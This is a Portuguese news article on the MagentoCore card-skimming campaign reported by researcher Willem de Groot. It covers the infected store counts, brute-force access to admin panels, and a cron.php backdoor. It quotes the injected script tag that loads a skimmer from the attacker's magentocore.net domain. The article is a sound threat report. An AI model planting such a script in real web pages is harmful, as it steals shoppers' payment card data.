De Acordo com Willem de Groot, MagentoCore skimmer já infectou 7.339 lojas Magento – 22 com domínio .pt. 

O investigador de cibersegurança Willem de Groot descobriu uma enorme campanha mal iciosa direcionada às lojas Magento. Os hackers já infectaram 7.339 lojas Magento com um script skimmer, apelidado de MagentoCore, que extrai dados de cartões de pagamento dos utilizadores que compraram nos sítios de Internet.

Os threat actores por trás desta campanha conseguiram comprometer os websites que executavam o Magento e injetaram o cartão de pagamento no seu código-fonte.

Os criminosos estão a tentar aceder ao painel de gestão da lojas Magento via ataques de brute-force.

No momento em que escrevo, consultando o serviço PublicWWW, podemos verificar que o script MagentoCore está atualmente implantado em 5.214 domínios.

O script malicioso é carregado nas páginas de checkout da loja e rouba os detalhes do cartão de pagamento fornecidos pelos utilizadores e envia-os para um servidor controlado pelo invasor.

Willem de Groot relatou que a campanha maiciosal está a usar um script skimmer carregado do domínio magentocore.net.

“A single group is responsible for planting skimmers on 7339 individual stores in the last 6 months. The MagentoCore skimmer is now the most successful to date.” de Groot wrote in a blog post.

 

Magento-1

O especialista encontrou o script MagentoCore em 7.339 lojas Magento nos últimos seis meses, a campanha ainda está em andamento e os hackers estão a comprometer as novas lojas Magento em um ritmo de 50 a 60 websites por dia.

“The average recovery time is a few weeks, but at least 1450 stores have hosted the MagentoCore.net parasite during the full past 6 months,” de Groot says. “New brands are hijacked at a pace of 50 to 60 stores per day.” continues the expert.

 

Depois da intrusão os hackers adicionam um trecho JavaScript ao modelo HTML:

<script type="text/javascript" src="hxxps://magentocore.net/mage/mage.js"></script>


 

Este script registra as teclas digitadas pelos clientes e as envia para o servidor “magentocore.net”.

O especialista percebeu que o malware implementa um mecanismo de recuperação automatico. Basicamente é adicionado um  backdoor ao cron.php que periodicamente descarrega o código malicioso, auto-executa-se, e após a execução, auto-exclui-se — uma técnica para se manter “obscuro” e discreto.

“The victim list contains multi-million dollar, publicly traded companies, which suggests the malware operators make a handsome profit,” de Groot added.

“But the real victims are eventually the customers, who have their card and identity stolen.”

 

De acordo com De Groot, atualmente, 4,2% de todas as lojas Magento estão infectadas com um ou mais scripts skimmer.

 

Em Portugal …

Segundo o website PublicWWW, 22 lojas com dominío .pt estão atualmente comprometidas.